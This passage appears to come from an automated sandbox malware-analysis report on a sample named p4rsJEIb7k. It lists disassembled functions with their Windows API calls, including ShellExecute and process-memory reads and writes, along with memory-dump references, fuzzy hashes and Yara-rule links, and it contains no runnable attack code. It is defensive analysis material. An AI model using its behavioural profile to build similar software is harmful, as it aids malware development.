                                                                                                                • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                                                                Function 0044710F Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00447151
                                                                                                                • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                                                • BeginPath.GDI32(?), ref: 004471B7
                                                                                                                • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                • String ID:
                                                                                                                • API String ID: 2338827641-0
                                                                                                                • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                                                                • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                                                                • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                                                                Function 0043770A Relevance: 7.6, APIs: 5, Instructions: 56sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                                                                • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                                                                • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                • String ID:
                                                                                                                • API String ID: 2875609808-0
                                                                                                                • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                                                                • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                                                                • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                                                                Function 0046FCC6 Relevance: 7.5, APIs: 5, Instructions: 49windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32 ref: 0046FD00
                                                                                                                • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                                                                • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                                                                • DestroyIcon.USER32(?), ref: 0046FD58
                                                                                                                • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$DestroyIcon
                                                                                                                • String ID:
                                                                                                                • API String ID: 3419509030-0
                                                                                                                • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                                                                • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                                                                • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                                                                Function 004555B8 Relevance: 7.5, APIs: 5, Instructions: 45windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                • String ID:
                                                                                                                • API String ID: 4023252218-0
                                                                                                                • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                                                • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                                                • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                                                Function 0046032B Relevance: 7.5, APIs: 5, Instructions: 43windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                                                • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                                                • MessageBeep.USER32(00000000), ref: 0046036D
                                                                                                                • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                                                                • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3741023627-0
                                                                                                                • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                                                                • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                                                                • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                                                                Function 00455505 Relevance: 7.5, APIs: 5, Instructions: 43windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1489400265-0
                                                                                                                • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                                                                • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                                                                • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                                                                Function 0045551F Relevance: 7.5, APIs: 5, Instructions: 42windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                                                • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1042038666-0
                                                                                                                • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                                                                • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                                                                • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                                                                Function 0043315E Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2625713937-0
                                                                                                                • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                                                                • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                                                                • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                                                                Function 0040AB16 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 423COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Default$|k
                                                                                                                • API String ID: 0-2254895183
                                                                                                                • Opcode ID: 404d7240c4bb856f681ff9cdf52c8ed6758caabbd7f7f5126ad75ded5c77f63b
                                                                                                                • Instruction ID: 39a525bc613f0e7e9485e4ea944b13d532e73913c0a35fc25f8fa2b96209a7b9
                                                                                                                • Opcode Fuzzy Hash: 404d7240c4bb856f681ff9cdf52c8ed6758caabbd7f7f5126ad75ded5c77f63b
                                                                                                                • Instruction Fuzzy Hash: 51F19F706083018BD714DF25C484A6BB7E5AF85314F64886FF885AB392D738EC55CB9B
                                                                                                                Function 00466999 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 312COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                                                • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileName$OpenSave
                                                                                                                • String ID: X$HH
                                                                                                                • API String ID: 3924019920-1944015008
                                                                                                                • Opcode ID: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                                                • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                                • Opcode Fuzzy Hash: 148ffd08a53066c169799d7010fd2328abbb1436974d200da898f01e024381e3
                                                                                                                • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                                Function 0046CDA0 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 263comCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                                                • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                                                • CoUninitialize.OLE32 ref: 0046CE50
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateInitializeInstanceUninitialize
                                                                                                                • String ID: .lnk
                                                                                                                • API String ID: 948891078-24824748
                                                                                                                • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                                                • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                                                • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                                                Function 0045377F Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 236windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetMenuItemInfoW.USER32(?,?), ref: 004538EF
                                                                                                                • SetMenuItemInfoW.USER32(00000011,?,00000000,?), ref: 004539C4
                                                                                                                • SetMenuDefaultItem.USER32(?,000000FF,00000000,?,?), ref: 004539E0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$Info$Default
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 1306138088-4108050209
                                                                                                                • Opcode ID: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                • Instruction ID: 97d09e0af2b4d046480d7fb626e7fa0667c22e7462995616ff61acde959b3bac
                                                                                                                • Opcode Fuzzy Hash: c8c2b72c749714a23e45c10816ef9459d7fe91b5f095051f547869ed1843acb9
                                                                                                                • Instruction Fuzzy Hash: 747118F15083015AD714DF65C881B6BB7E4EB98396F04491FFD8082292D7BCDA4CC7AA
                                                                                                                Function 0042D2CC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 204COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Variant$ClearCopyInit
                                                                                                                • String ID: 4RH
                                                                                                                • API String ID: 1785138364-749298218
                                                                                                                • Opcode ID: c26f7a3086022908b18cdef591f48b83bab91b2854b3ff3a8353accd24870fc8
                                                                                                                • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                                                • Opcode Fuzzy Hash: c26f7a3086022908b18cdef591f48b83bab91b2854b3ff3a8353accd24870fc8
                                                                                                                • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                                                Function 00457C08 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 158COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseExecuteHandleShell
                                                                                                                • String ID: <$@
                                                                                                                • API String ID: 283469938-1426351568
                                                                                                                • Opcode ID: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                                                                • Instruction ID: 09e461bdfc47c8bdd671eddb31188d347eda7c51057725e13e77015b5001baed
                                                                                                                • Opcode Fuzzy Hash: 669f3797eafbd6ea24f738bceaf78c3ad3f6bdf3b3f8ec2a74c9f7251b65f49f
                                                                                                                • Instruction Fuzzy Hash: EA510FB55083009FC710EF61D985A5BB7E4AF84709F00492EFD44AB392DB39ED48CB9A
                                                                                                                Function 00438A5D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                                • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                                  • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                                • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.4328041504.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.4327991285.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328200866.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328253780.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.4328370525.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_p4rsJEIb7k.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                                • String ID: @
                                                                                                                • API String ID: 4055202900-2766056989
                                                                                                                • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                                                • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                                                • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                                                Function 0045F132 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 128windowCOMMON
